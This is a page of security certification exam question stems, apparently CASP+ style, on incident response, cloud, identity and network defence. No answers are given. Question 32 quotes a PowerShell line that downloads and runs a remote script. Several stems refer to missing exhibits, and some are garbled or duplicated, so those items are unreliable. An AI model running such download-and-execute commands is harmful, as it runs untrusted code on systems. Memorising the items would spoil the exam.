MoreExam
1. Question Content...
EXPLANATION
Answer: X - EXPLANATION Content.
Question1: A security analyst discovered that the company's WAF was not properly configured. The main web server was breached, and the following payload was found in one of the malicious requests:Which of the following would BEST mitigate this vulnerability?
Question2: A health company has reached the physical and computing capabilities in its datacenter, but the computing demand continues to increase. The infrastructure is fully virtualized and runs custom and commercial healthcare application that process sensitive health and payment information. Which of the following should the company implement to ensure it can meet the computing demand while complying with healthcare standard for virtualization and cloud computing?
Question3: A company publishes several APIs for customers and is required to use keys to segregate customer data sets.Which of the following would be BEST to use to store customer keys?
Question4: A university issues badges through a homegrown identity management system to all staff and students. Each week during the summer, temporary summer school students arrive and need to be issued a badge to access minimal campus resources. The security team received a report from an outside auditor indicating the homegrown system is not consistent with best practices in the security field and leaves the institution vulnerable.Which of the following should the security team recommend FIRST?
Question5: An organization's existing infrastructure includes site-to-site VPNs between datacenters. In the past year, a sophisticated attacker exploited a zero-day vulnerability on the VPN concentrator. Consequently, the Chief Information Security Officer (CISO) is making infrastructure changes to mitigate the risk of service loss should another zero-day exploit be used against the VPN solution.Which of the following designs would be BEST for the CISO to use?
Question6: A security engineer needs to implement a solution to increase the security posture of user endpoints by providing more visibility and control over local administrator accounts. The endpoint security team is overwhelmed with alerts and wants a solution that has minimal operational burdens. Additionally, the solution must maintain a positive user experience after implementation.Which of the following is the BEST solution to meet these objectives?
Question7: A company is looking for a solution to hide data stored in databases. The solution must meet the following requirements:Be efficient at protecting the production environmentNot require any change to the applicationAct at the presentation layerWhich of the following techniques should be used?
Question8: The goal of a Chief information Security Officer (CISO) providing up-to-date metrics to a bank's risk committee is to ensure:
Question9: The Chief Information Security Officer of a startup company has asked a security engineer to implement a software security program in an environment that previously had little oversight.Which of the following testing methods would be BEST for the engineer to utilize in this situation?
Question10: Which of the following protocols is a low power, low data rate that allows for the creation of PAN networks?
Question11: A company in the financial sector receives a substantial number of customer transaction requests via email. While doing a root-cause analysis conceding a security breach, the CIRT correlates an unusual spike in port 80 traffic from the IP address of a desktop used by a customer relations employee who has access to several of the compromised accounts. Subsequent antivirus scans of the device do not return an findings, but the CIRT finds undocumented services running on the device. Which of the following controls would reduce the discovery time for similar in the future.
Question12: An organization's hunt team thinks a persistent threats exists and already has a foothold in the enterprise network.Which of the following techniques would be BEST for the hunt team to use to entice the adversary to uncover malicious activity?
Question13: Ann, a CIRT member, is conducting incident response activities on a network that consists of several hundred virtual servers and thousands of endpoints and users. The network generates more than 10,000 log messages per second. The enterprise belong to a large, web-based cryptocurrency startup, Ann has distilled the relevant information into an easily digestible report for executive management . However, she still needs to collect evidence of the intrusion that caused the incident. Which of the following should Ann use to gather the required information?
Question14: Immediately following the report of a potential breach, a security engineer creates a forensic image of the server in question as part of the organization incident response procedure. Which of the must occur to ensure the integrity of the image?
Question15: A security analyst is performing a vulnerability assessment on behalf of a client. The analyst must define what constitutes a risk to the organization.Which of the following should be the analyst's FIRST action?
Question16: A security analyst observes the following while looking through network traffic in a company's cloud log:Which of the following steps should the security analyst take FIRST?
Question17: The Chief information Officer (CIO) asks the system administrator to improve email security at the company based on the following requirements:* Transaction being requested by unauthorized individuals.* Complete discretion regarding client names, account numbers, and investment information.* Malicious attackers using email to malware and ransomeware.* Exfiltration of sensitive company information.The cloud-based email solution will provide anti-malware reputation-based scanning, signature-based scanning, and sandboxing. Which of the following is the BEST option to resolve the boar's concerns for this email migration?
Question18: A company is outsourcing to an MSSP that performs managed detection and response services. The MSSP requires a server to be placed inside the network as a log aggregate and allows remote access to MSSP analyst. Critical devices send logs to the log aggregator, where data is stored for 12 months locally before being archived to a multitenant cloud. The data is then sent from the log aggregate to a public IP address in the MSSP datacenter for analysis.A security engineer is concerned about the security of the solution and notes the following.* The critical devise send cleartext logs to the aggregator.* The log aggregator utilize full disk encryption.* The log aggregator sends to the analysis server via port 80.* MSSP analysis utilize an SSL VPN with MFA to access the log aggregator remotely.* The data is compressed and encrypted prior to being achieved in the cloud.Which of the following should be the engineer's GREATEST concern?
Question19: A security analyst is researching containerization concepts for an organization. The analyst is concerned about potential resource exhaustion scenarios on the Docker host due to a single application that is overconsuming available resources.Which of the following core Linux concepts BEST reflects the ability to limit resource allocation to containers?
Question20: A company is migrating from company-owned phones to a BYOD strategy for mobile devices. The pilot program will start with the executive management team and be rolled out to the rest of the staff in phases. The company's Chief Financial Officer loses a phone multiple times a year.Which of the following will MOST likely secure the data on the lost device?
Question21: Technicians have determined that the current server hardware is outdated, so they have decided to throw it out.Prior to disposal, which of the following is the BEST method to use to ensure no data remnants can be recovered?
Question22: A security architect is implementing a web application that uses a database back end. Prior to the production, the architect is concerned about the possibility of XSS attacks and wants to identify security controls that could be put in place to prevent these attacks.Which of the following sources could the architect consult to address this security concern?
Question23: A financial services company wants to migrate its email services from on-premises servers to a cloud-based email solution. The Chief information Security Officer (CISO) must brief board of directors on the potential security concerns related to this migration. The board is concerned about the following.* Transactions being required by unauthorized individual* Complete discretion regarding client names, account numbers, and investment information.* Malicious attacker using email to distribute malware and ransom ware.* Exfiltration of sensitivity company information.The cloud-based email solution will provide an6-malware, reputation-based scanning, signature-based scanning, and sandboxing. Which of the following is the BEST option to resolve the board's concerns for this email migration?
Question24: A security analyst is investigating a series of suspicious emails by employees to the security team. The email appear to come from a current business partner and do not contain images or URLs. No images or URLs were stripped from the message by the security tools the company uses instead, the emails only include the following in plain text.Which of the following should the security analyst perform?
Question25: A security engineer at a company is designing a system to mitigate recent setbacks caused competitors that are beating the company to market with the new products. Several of the products incorporate propriety enhancements developed by the engineer's company. The network already includes a SEIM and a NIPS and requires 2FA for all user access. Which of the following system should the engineer consider NEXT to mitigate the associated risks?
Question26: A security analyst is reviewing the following output:Which of the following would BEST mitigate this type of attack?
Question27: A penetration tester obtained root access on a Windows server and, according to the rules of engagement, is permitted to perform post-exploitation for persistence.Which of the following techniques would BEST support this?
Question28: A security auditor needs to review the manner in which an entertainment device operates. The auditor is analyzing the output of a port scanning tool to determine the next steps in the security review. Given the following log output.The best option for the auditor to use NEXT is:
Question29: A systems administrator is in the process of hardening the host systems before connecting to the network. The administrator wants to add protection to the boot loader to ensure the hosts are secure before the OS fully boots.Which of the following would provide the BEST boot loader protection?
Question30: In preparation for the holiday season, a company redesigned the system that manages retail sales and moved it to a cloud service provider. The new infrastructure did not meet the company's availability requirements. During a postmortem analysis, the following issues were highlighted:1. International users reported latency when images on the web page were initially loading.2. During times of report processing, users reported issues with inventory when attempting to place orders.3. Despite the fact that ten new API servers were added, the load across servers was heavy at peak times.Which of the following infrastructure design changes would be BEST for the organization to implement to avoid these issues in the future?
Question31: A pharmaceutical company recently experienced a security breach within its customer-facing web portal. The attackers performed a SQL injection attack and exported tables from the company's managed database, exposing customer information.The company hosts the application with a CSP utilizing the IaaS model. Which of the following parties is ultimately responsible for the breach?
Question32: A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell EX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois Which of the following security controls would have alerted and prevented the next phase of the attack?
Question33: A company is implementing SSL inspection. During the next six months, multiple web applications that will be separated out with subdomains will be deployed.Which of the following will allow the inspection of the data without multiple certificate deployments?
Question34: A company plans to build an entirely remote workforce that utilizes a cloud-based infrastructure. The Chief Information Security Officer asks the security engineer to design connectivity to meet the following requirements:Only users with corporate-owned devices can directly access servers hosted by the cloud provider.The company can control what SaaS applications each individual user can access.User browser activity can be monitored.Which of the following solutions would BEST meet these requirements?
Question35: A security engineer was auditing an organization's current software development practice and discovered that multiple open-source libraries were Integrated into the organization's software. The organization currently performs SAST and DAST on the software it develops.Which of the following should the organization incorporate into the SDLC to ensure the security of the open-source libraries?
Question36: A review of the past year's attack patterns shows that attackers stopped reconnaissance after finding a susceptible system to compromise. The company would like to find a way to use this information to protect the environment while still gaining valuable attack information.Which of the following would be BEST for the company to implement?
Question37: A host on a company's network has been infected by a worm that appears to be spreading via SMB. A security analyst has been tasked with containing the incident while also maintaining evidence for a subsequent investigation and malware analysis.Which of the following steps would be best to perform FIRST?
Question38: A security team received a regulatory notice asking for information regarding collusion and pricing from staff members who are no longer with the organization. The legal department provided the security team with a list of search terms to investigate.This is an example of:
Question39: A security consultant needs to set up wireless security for a small office that does not have Active Directory. Despite the lack of central account management, the office manager wants to ensure a high level of defense to prevent brute-force attacks against wireless authentication.Which of the following technologies would BEST meet this need?
Question40: An organization is implementing a new identity and access management architecture with the following objectives:Supporting MFA against on-premises infrastructureImproving the user experience by integrating with SaaS applicationsApplying risk-based policies based on locationPerforming just-in-time provisioningWhich of the following authentication protocols should the organization implement to support these requirements?
Question41: Over the last 90 days, many storage services has been exposed in the cloud services environments, and the security team does not have the ability to see is creating these instance. Shadow IT is creating data services and instances faster than the small security team can keep up with them. The Chief information security Officer (CIASO) has asked the security officer (CISO) has asked the security lead architect to architect to recommend solutions to this problem.Which of the following BEST addresses the problem best address the problem with the least amount of administrative effort?
Question42: A technician is reviewing the logs and notices a large number of files were transferred to remote sites over the course of three months. This activity then stopped. The files were transferred via TLS-protected HTTP sessions from systems that do not send traffic to those sites.The technician will define this threat as:
Question43: A cybersecurity analyst receives a ticket that indicates a potential incident is occurring. There has been a large in log files generated by a generated by a website containing a ''Contact US'' form. The analyst must determine if the increase in website traffic is due to a recent marketing campaign of if this is a potential incident. Which of the following would BEST assist the analyst?
Question44: A company provides guest WiFi access to the internet and physically separates the guest network from the company's internal WIFI. Due to a recent incident in which an attacker gained access to the compay's intend WIFI, the company plans to configure WPA2 Enterprise in an EAP- TLS configuration. Which of the following must be installed on authorized hosts for this new configuration to work properly?
Question45: While investigating a security event, an analyst finds evidence that a user opened an email attachment from an unknown source. Shortly after the user opened the attachment, a group of servers experienced a large amount of network and resource activity. Upon investigating the servers, the analyst discovers the servers were encrypted by ransomware that is demanding payment within 48 hours or all data will be destroyed. The company has no response plans for ransomware.Which of the following is the NEXT step the analyst should take after reporting the incident to the management team?
Question46: A user from the sales department opened a suspicious file attachment. The sales department then contacted the SOC to investigate a number of unresponsive systems, and the team successfully identified the file and the origin of the attack.Which of the following is the NEXT step of the incident response plan?
Question47: A large number of emails have been reported, and a security analyst is reviewing the following information from the emails:As part of the image process, which of the following is the FIRST step the analyst should take?
Question48: A company is moving most of its customer-facing production systems to the cloud-facing production systems to the cloud. IaaS is the service model being used. The Chief Executive Officer is concerned about the type of encryption available and requires the solution must have the highest level of security.Which of the following encryption methods should the cloud security engineer select during the implementation phase?
Question49: A small company recently developed prototype technology for a military program. The company's security engineer is concerned about potential theft of the newly developed, proprietary information.Which of the following should the security engineer do to BEST manage the threats proactively?
Question50: A security analyst detected a malicious PowerShell attack on a single server. The malware used the Invoke-Expression function to execute an external malicious script. The security analyst scanned the disk with an antivirus application and did not find any IOCs. The security analyst now needs to deploy a protection solution against this type of malware.Which of the following BEST describes the type of malware the solution should protect against?
Question51: An HVAC contractor requested network connectivity permission to remotely support/troubleshoot equipment issues at a company location. Currently, the company does not have a process that allows vendors remote access to the corporate network Which of the following solutions represents the BEST course of action to allow the contractor access?
Question52: Which of the following is a benefit of using steganalysis techniques in forensic response?
Question53: An IT administrator is reviewing all the servers in an organization and notices that a server is missing crucial practice against a recent exploit that could gain root access.Which of the following describes the administrator's discovery?
Question54: A threat hunting team receives a report about possible APT activity in the network.Which of the following threat management frameworks should the team implement?